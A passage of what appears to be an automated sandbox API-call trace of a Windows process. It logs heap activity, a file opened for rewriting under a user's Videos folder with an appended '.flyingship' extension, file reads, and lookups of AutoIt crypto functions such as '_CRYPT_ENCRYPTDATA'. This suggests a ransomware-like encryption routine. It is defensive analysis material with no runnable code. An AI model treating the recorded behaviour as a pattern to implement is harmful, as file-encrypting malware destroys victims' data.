(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth")) returned 0x10 [0199.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0199.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff18 | out: hHeap=0x8a0000) returned 1 [0199.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0199.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0199.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0199.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0199.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0199.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0199.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0199.483] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.flyingship.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\ioptjd0u8gbyjv6.flyingship.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0199.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0199.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0199.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0199.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0199.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0199.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0199.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0199.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.484] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0199.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0199.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0199.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0199.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0199.484] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0199.484] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0199.484] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0199.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0199.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0199.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0199.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0199.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0199.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0199.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0199.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0199.485] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0199.486] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xb336, lpOverlapped=0x0) returned 1 [0199.488] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0199.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0199.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0199.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0199.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb336) returned 0xbea018 [0199.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0199.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0199.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0199.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0199.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0199.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb336) returned 0xbf5358 [0199.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0199.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.490] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0199.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0199.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0199.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0199.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb336) returned 0xbea018 [0199.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0199.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0199.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0199.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0199.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.490] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0199.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0199.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0199.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0199.491] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.491] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0199.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2758 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb336) returned 0xbea018 [0199.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0199.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2778 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0199.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0199.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0199.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0199.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0199.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0199.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0199.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0199.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb336) returned 0xc00698 [0199.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0199.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0199.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0199.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0199.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0199.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0199.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0199.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0199.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0199.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0199.493] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0199.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0199.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0199.493] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0199.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0199.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0199.493] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0199.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26f8 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0199.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0199.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd558 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0199.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0199.494] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0199.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.494] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0199.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0199.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0199.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0199.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0199.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0199.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0199.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0199.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0199.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0199.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0199.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0199.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0199.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0199.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0199.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0199.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.495] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0199.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0199.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0199.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0199.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0199.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0199.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0199.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0199.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0199.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 